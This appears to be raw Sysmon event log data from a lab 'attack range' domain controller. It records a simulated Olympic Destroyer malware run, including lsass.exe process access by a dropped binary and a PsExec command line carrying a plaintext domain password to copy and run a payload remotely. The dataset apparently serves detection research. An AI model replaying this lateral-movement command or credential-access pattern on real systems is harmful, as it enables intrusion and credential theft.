10:57:36.134{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:36.132{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.050{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5806-000000003802}6360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.050{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-131F-6216-5806-000000003802}6360C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.034{C8EA50B7-131F-6216-5806-000000003802}63607112C:\Windows\system32\conhost.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F5EE32697D20CCB904F0DD4395C9E69,SHA256=F0D179AC67C2157D36A7C5F79D82AAB98D99698B9908136364882607B3865410,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.997{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-131F-6216-5806-000000003802}6360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.997{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131F-6216-5806-000000003802}6360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:37.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55AF9DAD0FC2E18A5ABC3ABFF306FD83,SHA256=087EF5346EC60E808DE7DF05E29925C2289B8A14375C7A5C17D0C4359DB0B198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:37.329{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D95ABF6D0CCDC1B346F56A54694BFFB,SHA256=8B792B780CBDC317F54A85DB4A1B877AFE8F1176282A3856FECEFB21E964AD6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:37.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=525D1FD200D01AD43A9ACEDD3AB7EAC3,SHA256=DABCAC0187E1B825654200280BBC745A30FF38149DF2FE6FFBD3158E286D72B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:38.837{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD393919683FC279D01C10137ABC327,SHA256=9A7626DC2B51584FD01CCD8AEC5C1A7999AFFF378AE50CE17BE6C0FCB9184484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:38.376{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3591FFBE8D8D9063C9826082F1A2058A,SHA256=9F176460CFC4D07162230276032C4C6A98851BC3D94844F0767AE13AD35A5ADE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:38.366{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2AC3F12FD621D7572D18E2EE3B4084A4,SHA256=C26DB5642C32505C5C8B23E7E94055CEBA6D92E1A67D89793D4F72286CA9A650,IMPHASH=00000000000000000000000000000000falsetrue 154100x8000000000000000293314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.949{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.938{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.938{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.916{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.916{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:39.854{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:39.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFC73AC4EE84E2964CE3954377C7BED9,SHA256=77D00329826FDFB7BC9355B35938B0525E8FFBC340F6CDAD4F7D47FE4E37CBCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.801{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1323-6216-5E06-000000003802}6252C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.785{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1323-6216-5E06-000000003802}6252C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.738{C8EA50B7-1323-6216-5E06-000000003802}62525112C:\Windows\system32\conhost.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.686{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1F4CDB106489D6B1689934B56DAFEDD5,SHA256=1927739EBE15E4D2617698B81F96EE6D31A432A4A4D37EB28AA4120AF412BEA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.638{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1323-6216-5E06-000000003802}6252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.618{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1323-6216-5E06-000000003802}6252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:37.555{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53782-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.487{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.486{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1323-6216-5D06-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:40.580{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C2D86B19E5BE27012F1F717A3E3A82B,SHA256=E1E0D30DE2C1150CDB09FF581FF93292646045F56C14B67F6C443AA614816C34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.301{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 